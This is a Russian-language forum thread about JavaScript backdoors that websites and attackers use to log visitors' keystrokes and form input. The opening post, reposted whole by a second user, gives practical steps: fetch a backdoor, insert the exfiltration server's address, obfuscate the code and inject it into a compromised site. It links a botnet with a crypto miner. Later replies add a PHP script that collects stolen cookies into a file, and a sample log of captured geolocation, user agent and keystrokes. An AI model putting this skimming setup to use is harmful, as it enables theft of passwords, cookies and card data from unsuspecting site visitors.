• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Javascript backdoor или как сайты следят за пользователями.

DefWolf

Green Team
24.10.2017
288
794
BIT
0
spies.jpg


482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор: . Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
 

ДмитрийNZ

Green Team
22.01.2018
46
4
BIT
0
Посмотреть вложение 15560

482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор: . Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
Довольно интересно
 
  • Нравится
Реакции: DefWolf

OneTrust

Green Team
11.05.2017
35
12
BIT
0
У кого-то получилось запустить первую утилиту? Какие логи приходят?
 
M

Max2

Обфусифицируем код и вставляем на страницу сайта
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?

---- Добавлено позже ----

адрес сервера куда передаваться данные
что поднять надо на сервере?
 
Последнее редактирование модератором:

DefWolf

Green Team
24.10.2017
288
794
BIT
0
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?
Допустим вот: . Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP:
<?php
$cook = $_GET['cookie'];
if(isset($cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
 
Последнее редактирование:
  • Нравится
Реакции: Max2
M

Max2

Допустим вот: . Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP:
<?php
$cook = $_GET['cookie'];
if(isset(cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
спасибо
 

DefWolf

Green Team
24.10.2017
288
794
BIT
0
какие логи приходят?
Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
 
Последнее редактирование:
  • Нравится
Реакции: Max2
M

Max2

Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
всё понятно СУПЕР
 
  • Нравится
Реакции: DefWolf

DefWolf

Green Team
24.10.2017
288
794
BIT
0
У Ondrik8 есть тема, где он использует Javascript + ActiveXObject("Shell.Application"), для загрузки бэкдора. Не забывай, что это уголовно наказуемо
 
Последнее редактирование:
  • Нравится
Реакции: erlan1749

Henrey Hamilton

New member
18.08.2019
3
0
BIT
0
Что-то я не могу понять, как с помощью js с фронта можно запускать zip бомбу, например?! Это ж надо выйти из песочницы браузера.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!